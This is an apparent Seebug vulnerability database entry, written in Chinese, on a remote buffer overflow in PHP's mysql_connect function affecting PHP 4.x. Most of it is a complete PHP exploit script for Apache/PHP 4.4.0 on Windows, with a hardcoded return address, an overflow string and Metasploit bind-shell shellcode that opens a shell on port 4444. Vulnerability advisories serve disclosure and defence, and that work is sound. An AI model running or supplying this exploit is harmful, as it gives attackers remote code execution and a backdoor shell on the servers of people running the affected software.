PHP MySQL_Connect远程溢出漏洞

2008-10-05T00:00:00
ID SSV:4152
Type seebug
Reporter Root
Modified 2008-10-05T00:00:00

Description

BUGTRAQ ID: 16145

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP中存在远程溢出漏洞,攻击者可以利用这个漏洞在受影响的Web Server上执行任意代码。失败的攻击尝试也可能导致Web Server崩溃。

请注意通常情况下远程攻击者是无法修改访问mysql_connect函数的参数的,因此可限制攻击的可能性。

PHP PHP 4.4.1 PHP PHP 4.4.0 PHP PHP 4.3.1 PHP


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.php.net target=_blank>http://www.php.net</a>

                                        
                                            
                                                &lt;?php

//Exploit for
//    Apache/1.3.33
//    PHP/4.4.0
//Windows only

$eip = &quot;71AB5651&quot;;  //EIP - CALL ESI from Winsock 2.0 ws2_32.dll v5.1.2600.0
$esi = &quot;10000000&quot;;  //ESI - Temporary. The memory under this location will be trashed.

//Metasploit win32 bind shell on port 4444
//Thread exit method, no filter
$shellcode = pack(&quot;H*&quot;,&quot;fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f188b5f2001eb498b348b01ee31c099ac84c07407c1ca0d01c2ebf43b54242875e58b5f2401eb668b0c4b8b5f1c01eb032c8b896c241c61c331db648b43308b400c8b701cad8b40085e688e4e0eec50ffd6665366683332687773325f54ffd068cbedfc3b50ffd65f89e56681ed0802556a02ffd068d909f5ad57ffd6535353535343534353ffd06668115c665389e19568a41a70c757ffd66a105155ffd068a4ad2ee957ffd65355ffd068e549864957ffd650545455ffd09368e779c67957ffd655ffd0666a646668636d89e56a505929cc89e76a4489e231c0f3aafe422dfe422c938d7a38ababab6872feb316ff7544ffd65b57525151516a0151515551ffd068add905ce53ffd66affff37ffd08b57fc83c464ffd652ffd068efcee06053ffd6ffd0&quot;);

//Endian conversion
$eip = substr($eip, 6, 2) . substr($eip, 4, 2) . substr($eip, 2, 2) . substr($eip, 0, 2);
$esi = substr($esi, 6, 2) . substr($esi, 4, 2) . substr($esi, 2, 2) . substr($esi, 0, 2);

$overflowstring = &quot;localhost:/&quot;;
$overflowstring .= &quot;XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&quot;;
$overflowstring .= pack(&quot;H*&quot;,$eip);    //EIP
$overflowstring .= pack(&quot;H*&quot;,$esi);    //ESI
$overflowstring .= &quot;/&quot;;

//If we don't define this, our shellcode gets truncated
$two = &quot;AAAAAAAAAA&quot;;

mysql_connect($overflowstring, $shellcode);

?&gt;